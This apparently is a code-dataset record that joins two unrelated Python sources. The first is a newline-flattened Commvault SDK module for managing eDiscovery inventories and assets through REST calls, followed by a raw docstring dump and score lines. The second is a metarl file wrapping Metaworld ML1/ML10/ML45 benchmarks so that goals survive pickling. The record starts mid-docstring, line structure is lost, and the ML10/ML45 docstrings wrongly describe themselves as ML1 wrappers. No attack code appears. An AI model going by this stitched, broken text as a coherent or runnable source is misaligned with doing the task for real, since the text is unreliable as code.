Index server name name_server (list) -- Name server assets which needs to be added to inventory Returns: object -- Instance of Inventory Class Raises: SDKException: if input data type is not valid if failed to add inventory if Index Server doesn't exists in commcell """ if not isinstance(inventory_name, str) or not isinstance(index_server, str): raise SDKException('Inventory', '101') req_json = copy.deepcopy(InventoryConstants.INVENTORY_ADD_REQUEST_JSON) if name_server: asset_json = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON) for server in name_server: asset_json['name'] = server req_json['assets'].append(asset_json) req_json['inventoryName'] = inventory_name if not self._commcell_object.index_servers.has(index_server): raise SDKException('Inventory', '102', "Given index server name not exists on this commcell") index_server_obj = self._commcell_object.index_servers.get(index_server) req_json['analyticsEngineCloud']['cloudId'] = index_server_obj.cloud_id req_json['analyticsEngineCloud']['cloudDisplayName'] = index_server_obj.cloud_name flag, response = self._cvpysdk_object.make_request( 'POST', self._API_INVENTORIES, req_json ) if flag: if response.json() and 'errorResp' in response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to create inventory with error [{err_resp['errorMessage']}]") elif 'inventoryList' in response.json(): inventory = response.json()['inventoryList'][0] inventory_id = inventory['inventoryId'] self.refresh() return Inventory(self._commcell_object, inventory_name, inventory_id) raise SDKException('Inventory', '102', f"Failed to create inventory with response - {response.json()}") raise SDKException('Inventory', '105') self._response_not_success(response) def delete(self, inventory_name): """Deletes the inventory from the commcell Args: inventory_name (str) -- Inventory name to be deleted Returns: None Raises: SDKException: if unable to find inventory if failed to delete inventory if input type is not valid """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') if not self.has_inventory(inventory_name): raise SDKException('Inventory', '106') flag, response = self._cvpysdk_object.make_request( 'DELETE', self._API_DELETE_INVENTORY % self._inventories[inventory_name.lower()]['inventoryId'] ) if flag: if response.json() and 'errorResp' in response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to Delete inventory with error [{err_resp['errorMessage']}]") self.refresh() else: raise SDKException('Inventory', '107') else: self._response_not_success(response) def refresh(self): """Refresh the inventories associated with the commcell.""" self._inventories = self._get_inventories() def get_properties(self, inventory_name): """Returns a properties of the specified Inventory Args: inventory_name (str) -- name of the inventory Returns: dict - properties for the given inventory name """ return self._inventories[inventory_name.lower()] def has_inventory(self, inventory_name): """Checks if a inventory exists in the commcell with the input name. Args: inventory_name (str) -- name of the inventory Returns: bool - boolean output to specify whether the inventory exists in the commcell or not Raises: SDKException: if type of the inventory name argument is not string """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') return self._inventories and inventory_name.lower() in map(str.lower, self._inventories) def get(self, inventory_name): """Returns a Inventory object for the given inventory name. Args: inventory_name (str) -- name of the inventory Returns: obj -- Object of Inventory class Raises: SDKException: if inventory doesn't exists in commcell if inventory_name is not of type string """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') if self.has_inventory(inventory_name): inventory_id = self._inventories[inventory_name.lower()]['inventoryId'] return Inventory(self._commcell_object, inventory_name, inventory_id) raise SDKException('Inventory', '106') class Inventory(): """Class for performing operations on a single inventory""" def __init__(self, commcell_object, inventory_name, inventory_id=None): """Initialize an object of the Inventory class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Inventory class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._services = commcell_object._services self._cvpysdk_obj = self._commcell_object._cvpysdk_object self._inventory_id = None self._inventory_name = inventory_name self._inventory_props = None self._index_server_name = None self._index_server_cloud_id = None self._security_associations = None self._schedule = None self._data_source = None self._handler = None self._API_GET_INVENTORY_DETAILS = self._services['EDISCOVERY_INVENTORY'] self._API_SECURITY = self._services['SECURITY_ASSOCIATION'] self._API_SECURITY_ENTITY = self._services['ENTITY_SECURITY_ASSOCIATION'] self._API_GET_DEFAULT_HANDLER = self._services['EDISCOVERY_GET_DEFAULT_HANDLER'] if not inventory_id: self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id else: self._inventory_id = inventory_id self.refresh() self._ediscovery_client_obj = EdiscoveryClientOperations(class_object=self, commcell_object=commcell_object) def _response_not_success(self, response): """Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package """ raise SDKException('Response', '101', self._update_response_(response.text)) def _get_inventory_properties(self): """ Get inventory properties from the commcell Args: None Returns: dict -- Properties of inventory """ flag, response = self._cvpysdk_obj.make_request( 'GET', self._API_GET_INVENTORY_DETAILS % self._inventory_id ) if flag: if response.json() and 'inventoryList' in response.json(): inventory_props = response.json()['inventoryList'][0] self._index_server_name = inventory_props['analyticsEngineCloud']['cloudDisplayName'] self._index_server_cloud_id = inventory_props['analyticsEngineCloud']['cloudId'] self._inventory_name = inventory_props['inventoryName'] self._security_associations = inventory_props['securityAssociation']['associations'] return inventory_props raise SDKException('Inventory', '104') self._response_not_success(response) def refresh(self): """Refresh the inventory details for associated object""" self._inventory_props = self._get_inventory_properties() self._schedule = self._get_schedule_object() self._data_source, self._handler = self._get_data_source_handler_object() def get_assets(self): """Returns the Assets class instance for this inventory Args: None Returns: object -- Instance of Assets class """ return Assets(self._commcell_object, self.inventory_name, self.inventory_id) def start_collection(self): """Starts collection job on this inventory Args: None Return: None Raises: SDKException: if failed to start collection job """ return self._ediscovery_client_obj.start_job() def share(self, user_or_group_name, allow_edit_permission=False, is_user=True, ops_type=1): """Shares inventory with given user or user group in commcell Args: user_or_group_name (str) -- Name of user or group is_user (bool) -- Denotes whether this is user or group name default : True(User) allow_edit_permission (bool) -- whether to give edit permission or not to user or group ops_type (int) -- Operation type Default : 1 (Add) Supported : 1 (Add) 3 (Delete) Returns: None Raises: SDKException: if unable to update security associations if response is empty or not success """ if not isinstance(user_or_group_name, str): raise SDKException('Inventory', '101') request_json = copy.deepcopy(InventoryConstants.INVENTORY_SHARE_REQUEST_JSON) external_user = False association_response = None if ops_type == 1 and len(self.security_associations) > 1: association_request_json = copy.deepcopy(InventoryConstants.INVENTORY_SHARE_REQUEST_JSON) del association_request_json['securityAssociations'] association_request_json['entityAssociated']['entity'][0]['seaDataSourceId'] = int(self.inventory_id) # get security blob for this data source type entity - 132 flag, response = self._cvpysdk_obj.make_request( 'GET', self._API_SECURITY_ENTITY % (132, int(self.inventory_id)), association_request_json ) if flag: if response.json() and 'securityAssociations' in response.json(): association_response = response.json( )['securityAssociations'][0]['securityAssociations']['associations'] else: raise SDKException('Inventory', '102', 'Failed to get existing security associations') else: response_string = self._commcell_object._update_response_(response.text) raise SDKException('Response', '101', response_string) if '\\' in user_or_group_name: external_user = True if is_user: user_obj = self._commcell_object.users.get(user_or_group_name) user_id = user_obj.user_id request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userId'] = int(user_id) request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "13" request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userName'] = user_or_group_name elif external_user: request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['groupId'] = 0 request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "62" request_json['securityAssociations']['associations'][0]['userOrGroup'][0][ 'externalGroupName'] = user_or_group_name else: grp_obj = self._commcell_object.user_groups.get(user_or_group_name) grp_id = grp_obj.user_group_id request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userGroupId'] = int(grp_id) request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "15" request_json['securityAssociations']['associations'][0]['userOrGroup'][0][ 'userGroupName'] = user_or_group_name request_json['entityAssociated']['entity'][0]['seaDataSourceId'] = self.inventory_id request_json['securityAssociations']['associationsOperationType'] = ops_type if allow_edit_permission: request_json['securityAssociations']['associations'][0]['properties']['categoryPermission']['categoriesPermissionList'].append( InventoryConstants.EDIT_CATEGORY_PERMISSION) # Associate existing associations to the request if ops_type == 1 and len(self.security_associations) > 1: request_json['securityAssociations']['associations'].extend(association_response) flag, response = self._cvpysdk_obj.make_request( 'POST', self._API_SECURITY, request_json ) if flag: if response.json() and 'response' in response.json(): response_json = response.json()['response'][0] error_code = response_json['errorCode'] if error_code != 0: error_message = response_json['errorString'] raise SDKException( 'Inventory', '102', error_message) # update association list by refreshing inventory self.refresh() else: raise SDKException('Inventory', '111') else: response_string = self._commcell_object._update_response_(response.text) raise SDKException('Response', '101', response_string) def _get_data_source_handler_object(self): """returns the data source and handler object associated with this inventory Args: None Returns: obj,obj -- Instance of DataSource object,Instance of Handler object Raises: SDKException: if failed to get datasource or handler details """ flag, response = self._cvpysdk_obj.make_request( 'GET', self._API_GET_DEFAULT_HANDLER % self.inventory_id) if flag: if response.json() and 'handlerInfos' in response.json(): handler_list = response.json()['handlerInfos'] if not isinstance(handler_list, list): raise SDKException('Inventory', '102', "Failed to get Datasource/Handler details") handler_details = handler_list[0] ds_name = handler_details['dataSourceName'] handler_name = handler_details['handlerName'] ds_obj = self._commcell_object.datacube.datasources.get(ds_name) handler_obj = ds_obj.ds_handlers.get(handler_name) return ds_obj, handler_obj raise SDKException('Inventory', '102', 'Unknown response while fetching datasource details') response_string = self._commcell_object._update_response_(response.text) raise SDKException('Response', '101', response_string) def _get_schedule_object(self): """Returns the schedule class object of schedule associated to this inventory Args: None Returns: object -- Instance of Schedule class Raises: SDKException: if failed to find schedule """ return Schedules(self).get() def get_inventory_data(self, handler_filter=""): """ Executes handler for fetching data from inventory Args: handler_filter (str) -- Filter which needs to applied for handler execution Returns: dict -- Dictionary of values fetched from handler execution Raises: SDKExpception: if error in fetching handler data if input is not valid """ if not isinstance(handler_filter, str): raise SDKException('Inventory', '101') if not self._handler: raise SDKException('Inventory', '102', 'No handler object initialised') return self._handler.get_handler_data(handler_filter=handler_filter) @property def properties(self): """Returns the properties of this inventory as dict""" return self._inventory_props @property def index_server_name(self): """Returns the index server name associated with this inventory""" return self._index_server_name @property def index_server_cloud_id(self): """Returns the index server id associated with this inventory""" return self._index_server_cloud_id @property def inventory_id(self): """Returns the inventory id associated with this inventory""" return self._inventory_id @property def inventory_name(self): """Returns the inventory name associated with this inventory""" return self._inventory_name @property def security_associations(self): """Returns the security blob associated with this inventory""" return self._security_associations @property def schedule(self): """Returns the schedule class object for schedule associated with this inventory""" return self._schedule @property def data_source(self): """Returns the DataSource class object for datasource associated with this inventory""" return self._data_source @property def handler(self): """Returns the Handler class object for default handler associated with this inventory""" return self._handler class Assets(): """Class to represent all assets in an inventory""" def __init__(self, commcell_object, inventory_name, inventory_id=None): """Initialize an object of the Assets class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Assets class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._services = commcell_object._services self._cvpysdk_obj = self._commcell_object._cvpysdk_object self._inventory_id = None self._inventory_name = inventory_name if not inventory_id: self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id else: self._inventory_id = inventory_id self._assets = None self._API_INVENTORIES = self._services['EDISCOVERY_INVENTORIES'] self._API_ASSETS = self._services['EDISCOVERY_ASSETS'] self.refresh() def _get_assets_properties(self): """gets the assets properties from inventory Args: None Returns: dict -- containing asset properties """ inv_mgr = self._commcell_object.activate.inventory_manager() inv_obj = inv_mgr.get(self._inventory_name) inv_obj.refresh() assets = {} for asset in inv_obj.properties['assets']: name = asset['name'].lower() assets[name] = asset return assets def refresh(self): """Refresh the assets details associated with this inventory""" self._assets = self._get_assets_properties() def _response_not_success(self, response): """Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package """ raise SDKException('Response', '101', self._update_response_(response.text)) def has_asset(self, asset_name): """Checks whether given asset exists in inventory or not Args: asset_name (str) -- Name of the asset Returns: bool -- true if asset exists else false """ return self._assets and asset_name.lower() in self._assets def get(self, asset_name): """Returns the asset object Args: asset_name (str) -- Name of the asset Returns: object -- Instance of Asset class Raises: SDKException: if input is not valid if asset doesn't exists in inventory """ if not isinstance(asset_name, str): raise SDKException('Inventory', '101') if not self.has_asset(asset_name): raise SDKException('Inventory', '109') return Asset(self._commcell_object, self._inventory_name, asset_name, self._inventory_id) def add(self, asset_name, asset_type=InventoryConstants.AssetType.NAME_SERVER, **kwargs): """Adds asset to the inventory Args: asset_name (str) -- Name of the asset asset_type (Enum) -- type of asset (Refer to InventoryConstants.AssetType class) kwargs for FILE SERVER type Asset: fqdn -- File server FQDN os -- File Server OS type ip -- File server IP country_code -- Country code (ISO 3166 2-letter code) country_name -- Country name domain -- File Server Domain name(optional) Returns: object -- Instance of Asset class Raises: SDKException: if input is not valid if failed to add asset to inventory """ if not isinstance(asset_name, str) or not isinstance(asset_type, InventoryConstants.AssetType): raise SDKException('Inventory', '101') request_json = copy.deepcopy(InventoryConstants.ASSET_ADD_TO_INVENTORY_JSON) request_json['inventoryId'] = int(self._inventory_id) asset_json = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON) asset_json['name'] = asset_name asset_json['type'] = asset_type.value property_json = copy.deepcopy(InventoryConstants.ASSET_PROPERTY_JSON) if asset_type.value == InventoryConstants.AssetType.FILE_SERVER.value: for prop in InventoryConstants.ASSET_FILE_SERVER_PROPERTY: prop_name = InventoryConstants.FIELD_PROPS_MAPPING[prop] default_value = "" if prop_name not in kwargs: # if domain is not passed, then form domain from fqdn if prop == InventoryConstants.FIELD_PROPERTY_DOMAIN: default_value = kwargs.get(InventoryConstants.KWARGS_FQDN) default_value = default_value.split(".", 1)[1] # always use asset name as file server name if prop == InventoryConstants.FIELD_PROPERTY_NAME: default_value = asset_name prop_json = copy.deepcopy(InventoryConstants.ASSET_PROPERTY_NAME_VALUE_PAIR_JSON) prop_json['name'] = prop prop_json['value'] = kwargs.get(prop_name, default_value) property_json['propertyValues']['nameValues'].append(prop_json) asset_json.update(property_json) request_json['assets'].append(asset_json) flag, response = self._cvpysdk_obj.make_request( 'PUT', self._API_INVENTORIES, request_json) if flag: if response.json() and 'errorResp' in response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to add asset to inventory with error [{err_resp['errorMessage']}]") self.refresh() return Asset(self._commcell_object, self._inventory_name, asset_name, self._inventory_id) raise SDKException('Inventory', '108') self._response_not_success(response) def delete(self, asset_name): """Delete the asset from the inventory Args: asset_name (str) -- Name of the asset Returns: None Raises: SDKException: if input is not valid if failed to delete the asset if unable to find this asset in inventory """ if not isinstance(asset_name, str): raise SDKException('Inventory', '101') if not self.has_asset(asset_name): raise SDKException('Inventory', '109') request_json = copy.deepcopy(InventoryConstants.ASSET_DELETE_FROM_INVENTORY_JSON) request_json['inventoryId'] = int(self._inventory_id) if 'assetId' in self._assets[asset_name.lower()]: request_json['assets'].append({'assetId': self._assets[asset_name.lower()]['assetId']}) else: req = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON) asset_obj = self.get(asset_name) asset_type = asset_obj.asset_type # for file server asset, asset name will not be display name in backend delete request. so fetch fqdn req['name'] = asset_obj.get_asset_prop(prop_name=InventoryConstants.FIELD_PROPERTY_DNSHOST) req['type'] = asset_type request_json['assets'].append(req) flag, response = self._cvpysdk_obj.make_request( 'PUT', self._API_ASSETS % self._inventory_id, request_json) if flag: if response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to delete asset from inventory with error [{err_resp['errorMessage']}]") self.refresh() return raise SDKException('Inventory', '110') self._response_not_success(response) @property def assets(self): """Returns the assets details associated with this inventory""" return self._assets class Asset(): """Class to represent single asset in an inventory""" def __init__(self, commcell_object, inventory_name, asset_name, inventory_id=None): """Initialize an object of the Asset class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory asset_name (str) -- Name of the asset inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Asset class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._services = commcell_object._services self._cvpysdk_obj = self._commcell_object._cvpysdk_object self._inventory_id = None self._inventory_name = inventory_name if not inventory_id: self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id else: self._inventory_id = inventory_id self._asset_name = asset_name self._asset_props = None self._asset_id = None self._crawl_start_time = None self._asset_type = None self._asset_status = None self._asset_name_values_props = None self.refresh() self._ediscovery_client_obj = EdiscoveryClientOperations(class_object=self, commcell_object=commcell_object) def _get_properties(self): """Returns the properties of this asset Args: None Returns: dict -- Containing properties of asset """ inv_mgr = self._commcell_object.activate.inventory_manager() inv_obj = inv_mgr.get(self._inventory_name) inv_obj.get_assets().refresh() for asset in inv_obj.properties['assets']: if asset['name'].lower() == self._asset_name.lower(): # for file server, we will not have asset id & crawl times self._asset_id = asset.get('assetId', 0) self._crawl_start_time = asset.get('crawlStartTime', 0) self._asset_type = asset.get('type', 0) self._asset_status = asset['status'] self._asset_name = asset['name'] self._asset_name_values_props = asset['propertyValues']['nameValues'] return asset return {} def refresh(self): """Refresh the asset details associated with this""" self._asset_props = self._get_properties() def get_job_history(self): """Returns the job history details of this asset Args: None Returns: list(dict) -- containing job history details Raises: SDKException: if failed to get job history if asset is not supported for this operation """ if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value: raise SDKException('Inventory', '102', "Not supported other than Name Server asset type") return self._ediscovery_client_obj.get_job_history() def get_job_status(self): """Returns the job status details of this asset Args: None Returns: dict -- containing job status details Raises: SDKException: if failed to get job status if asset is not supported for this operation """ if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value: raise SDKException('Inventory', '102', "Not supported other than Name Server asset type") return self._ediscovery_client_obj.get_job_status() def start_collection(self, wait_for_job=False, wait_time=60): """Starts collection job on this asset Args: wait_for_job (bool) -- specifies whether to wait for job to complete or not wait_time (int) -- time interval to wait for job completion in Mins Default : 60Mins Return: None Raises: SDKException: if failed to start collection job if asset is not supported for this operation """ if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value: raise SDKException('Inventory', '102', "Not supported other than Name Server asset type") return self._ediscovery_client_obj.start_job(wait_for_job=wait_for_job, wait_time=wait_time) def get_asset_prop(self, prop_name): """returns the property value for given property name for this asset Args: prop_name (str) -- Name of the property Returns: str -- Value of the property """ for prop in self._asset_name_values_props: name = prop['name'] if name == prop_name: return prop['value'] return "" @property def asset_id(self): """Returns the asset id with this asset""" return self._asset_id @property def asset_name(self): """Returns the asset name with this asset""" return self._asset_name @property def crawl_start_time(self): """Returns the crawl start time with this asset""" return self._crawl_start_time @property def asset_type(self): """Returns the asset type for this asset""" return self._asset_type @property def asset_status(self): """Returns the asset status for this asset""" return self._asset_status @property def asset_props(self): """Returns the property values for this asset""" return self._asset_name_values_props @property def inventory_id(self): """Returns the inventory id for this asset""" return self._inventory_id
en
0.641736
# -*- coding: utf-8 -*- # -------------------------------------------------------------------------- # Copyright Commvault Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # -------------------------------------------------------------------------- Main file for performing operations on inventory manager app under Activate. Inventories, Inventory, Assets & Asset are the four classes defined in this file Inventories: class for representing all inventories in the commcell Inventory: class for representing a single inventory in the commcell Assets: class for representing all assets in an inventory Asset: class to represent single asset in an inventory Inventories: __init__() -- initialise object of the Inventories class _get_inventories() -- Gets all inventories in the commcell _response_not_success() -- parses through the exception response, and raises SDKException refresh() -- refresh the Inventories from the commcell get_properties() -- returns the properties for given inventory name has_inventory() -- Checks if a given inventory name exists in the commcell or not get() -- returns the Inventory class object for given inventory name add() -- add inventory to the commcell delete() -- delete inventory from the commcell Inventory: __init__() -- initialise object of the Inventory class _response_not_success() -- parses through the exception response, and raises SDKException _get_inventory_properties() -- Gets all the properties of this inventory _get_schedule_object() -- returns the schedule class object associated to this inventory _get_data_source_handler_object() -- returns the datasource and default handler object for this inventory refresh() -- refresh the properties of the inventory get_assets() -- returns the Assets class object for this inventory share() -- shares inventory with other user or user group start_collection() -- starts collection job on this inventory get_inventory_data() -- returns data from inventory Inventory Attributes ----------------- **properties** -- returns properties of the inventory **index_server_name** -- returns the index server name associated with this inventory **_index_server_cloud_id** -- returns the index server cloudid associated with this inventory **inventory_name** -- returns the inventory name **inventory_id** -- returns the inventory id **security_associations** -- returns the security associations blob of this inventory **schedule** -- returns the schedule object associated with this inventory **data_source** -- returns the DataSource object associated with this inventory **handler** -- returns the default handler object for this inventory Assets: __init__() -- initialise object of the Assets class refresh() -- refresh the assets associated with inventory add() -- adds asset to the inventory get() -- returns the instance of Asset class based on given asset name has_asset() -- returns whether given asset exists or not in inventory delete() -- deletes the asset from the inventory _get_assets_properties() -- returns the assets properties _response_not_success() -- parses through the exception response, and raises SDKException Assets Attributes: ---------------- **assets** -- returns the assets details as json Asset: __init__() -- initialise object of the Asset class _get_properties() -- returns the properties of the asset refresh() -- refresh the asset associated with inventory start_collection() -- starts collection job on this asset get_job_history() -- returns the job history details of this asset get_job_status() -- returns the job status details of this asset get_asset_prop() -- returns the asset property value for the given property name Asset Attributes: ----------------- **asset_id** -- returns the id of asset **asset_name** -- returns the name of asset **asset_type** -- returns the type of asset **crawl_start_time** -- returns the last crawl start time of asset **asset_props** -- returns the properties(name/value pair) of asset **asset_status** -- returns the status of asset **inventory_id** -- returns the inventory id of this asset Class for representing all inventories in the commcell. Initializes an instance of the Inventories class. Args: commcell_object (object) -- instance of the commcell class Returns: object - instance of the Inventories class Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package Gets all inventories from the commcell Args: None Return: list(dict) -- list Containing inventory details dict Raises: SDKException: if response is empty if response is not success Adds inventory to the commcell with given inputs Args: inventory_name (str) -- Name of the inventory index_server (str) -- Index server name name_server (list) -- Name server assets which needs to be added to inventory Returns: object -- Instance of Inventory Class Raises: SDKException: if input data type is not valid if failed to add inventory if Index Server doesn't exists in commcell Deletes the inventory from the commcell Args: inventory_name (str) -- Inventory name to be deleted Returns: None Raises: SDKException: if unable to find inventory if failed to delete inventory if input type is not valid Refresh the inventories associated with the commcell. Returns a properties of the specified Inventory Args: inventory_name (str) -- name of the inventory Returns: dict - properties for the given inventory name Checks if a inventory exists in the commcell with the input name. Args: inventory_name (str) -- name of the inventory Returns: bool - boolean output to specify whether the inventory exists in the commcell or not Raises: SDKException: if type of the inventory name argument is not string Returns a Inventory object for the given inventory name. Args: inventory_name (str) -- name of the inventory Returns: obj -- Object of Inventory class Raises: SDKException: if inventory doesn't exists in commcell if inventory_name is not of type string Class for performing operations on a single inventory Initialize an object of the Inventory class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Inventory class Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package Get inventory properties from the commcell Args: None Returns: dict -- Properties of inventory Refresh the inventory details for associated object Returns the Assets class instance for this inventory Args: None Returns: object -- Instance of Assets class Starts collection job on this inventory Args: None Return: None Raises: SDKException: if failed to start collection job Shares inventory with given user or user group in commcell Args: user_or_group_name (str) -- Name of user or group is_user (bool) -- Denotes whether this is user or group name default : True(User) allow_edit_permission (bool) -- whether to give edit permission or not to user or group ops_type (int) -- Operation type Default : 1 (Add) Supported : 1 (Add) 3 (Delete) Returns: None Raises: SDKException: if unable to update security associations if response is empty or not success # get security blob for this data source type entity - 132 # Associate existing associations to the request # update association list by refreshing inventory returns the data source and handler object associated with this inventory Args: None Returns: obj,obj -- Instance of DataSource object,Instance of Handler object Raises: SDKException: if failed to get datasource or handler details Returns the schedule class object of schedule associated to this inventory Args: None Returns: object -- Instance of Schedule class Raises: SDKException: if failed to find schedule Executes handler for fetching data from inventory Args: handler_filter (str) -- Filter which needs to applied for handler execution Returns: dict -- Dictionary of values fetched from handler execution Raises: SDKExpception: if error in fetching handler data if input is not valid Returns the properties of this inventory as dict Returns the index server name associated with this inventory Returns the index server id associated with this inventory Returns the inventory id associated with this inventory Returns the inventory name associated with this inventory Returns the security blob associated with this inventory Returns the schedule class object for schedule associated with this inventory Returns the DataSource class object for datasource associated with this inventory Returns the Handler class object for default handler associated with this inventory Class to represent all assets in an inventory Initialize an object of the Assets class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Assets class gets the assets properties from inventory Args: None Returns: dict -- containing asset properties Refresh the assets details associated with this inventory Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package Checks whether given asset exists in inventory or not Args: asset_name (str) -- Name of the asset Returns: bool -- true if asset exists else false Returns the asset object Args: asset_name (str) -- Name of the asset Returns: object -- Instance of Asset class Raises: SDKException: if input is not valid if asset doesn't exists in inventory Adds asset to the inventory Args: asset_name (str) -- Name of the asset asset_type (Enum) -- type of asset (Refer to InventoryConstants.AssetType class) kwargs for FILE SERVER type Asset: fqdn -- File server FQDN os -- File Server OS type ip -- File server IP country_code -- Country code (ISO 3166 2-letter code) country_name -- Country name domain -- File Server Domain name(optional) Returns: object -- Instance of Asset class Raises: SDKException: if input is not valid if failed to add asset to inventory # if domain is not passed, then form domain from fqdn # always use asset name as file server name Delete the asset from the inventory Args: asset_name (str) -- Name of the asset Returns: None Raises: SDKException: if input is not valid if failed to delete the asset if unable to find this asset in inventory # for file server asset, asset name will not be display name in backend delete request. so fetch fqdn Returns the assets details associated with this inventory Class to represent single asset in an inventory Initialize an object of the Asset class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory asset_name (str) -- Name of the asset inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Asset class Returns the properties of this asset Args: None Returns: dict -- Containing properties of asset # for file server, we will not have asset id & crawl times Refresh the asset details associated with this Returns the job history details of this asset Args: None Returns: list(dict) -- containing job history details Raises: SDKException: if failed to get job history if asset is not supported for this operation Returns the job status details of this asset Args: None Returns: dict -- containing job status details Raises: SDKException: if failed to get job status if asset is not supported for this operation Starts collection job on this asset Args: wait_for_job (bool) -- specifies whether to wait for job to complete or not wait_time (int) -- time interval to wait for job completion in Mins Default : 60Mins Return: None Raises: SDKException: if failed to start collection job if asset is not supported for this operation returns the property value for given property name for this asset Args: prop_name (str) -- Name of the property Returns: str -- Value of the property Returns the asset id with this asset Returns the asset name with this asset Returns the crawl start time with this asset Returns the asset type for this asset Returns the asset status for this asset Returns the property values for this asset Returns the inventory id for this asset
1.622338
2
src/metarl/envs/ml_wrapper.py
icml2020submission6857/metarl
2
6623568
from metaworld.benchmarks import ML1, ML10, ML45 class ML1WithPinnedGoal(ML1): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {})) class ML10WithPinnedGoal(ML10): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {})) class ML45WithPinnedGoal(ML45): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {}))
